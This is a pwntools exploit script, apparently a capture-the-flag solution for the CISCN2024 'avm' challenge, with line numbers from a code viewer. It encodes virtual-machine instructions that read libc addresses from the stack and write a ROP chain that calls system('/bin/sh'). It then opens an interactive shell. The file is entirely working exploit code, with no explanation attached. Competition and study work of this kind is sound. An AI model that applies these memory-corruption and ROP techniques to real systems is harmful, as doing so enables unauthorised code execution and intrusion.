1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34
| from pwn import * io = process("/home/ben/Desktop/CISCN2024/avm/pwn") libc = ELF("/home/ben/Desktop/CISCN2024/avm/libc.so.6") libc_start_main = 0x29d90 pop_rdi = 0x2a3e5 ret = 0x29139 system = 0x50d70 binsh = next(libc.search(b'/bin/sh')) gdb.attach(io,"b *$rebase(0x1aad)") def operation(opcode, i, j, k): return p32((opcode << 28) + (i << 5) + (j << 16) + k) def add(i, j, k): return operation(1, i, j, k) def sub(i, j, k): return operation(2, i, j, k) def store(i, j, k): return operation(9, i, j, k) def load(i, j, k): return operation(10, i, j, k) opcode = load(1, 0xd38, 4) + load(1, 0x160, 5) + \ sub(4, 5, 6) + load(1, 0x168, 7) + \ add(6, 7, 8) + load(1, 0x170, 9) + \ add(6, 9, 10) + load(1, 0x178, 11) + \ add(6, 11, 12) + load(1, 0x180, 13) + \ add(6, 13, 14) + store(1, 0x118, 8) + \ store(1, 0x120, 10) + store(1, 0x128, 12) + \ store(1, 0x130, 14) + p32(0) + \ p64(libc_start_main) + p64(pop_rdi) + \ p64(binsh) + p64(ret) + p64(system) io.send(opcode) io.recvuntil(b'opcode: Unsupported instruction\n') io.interactive()
|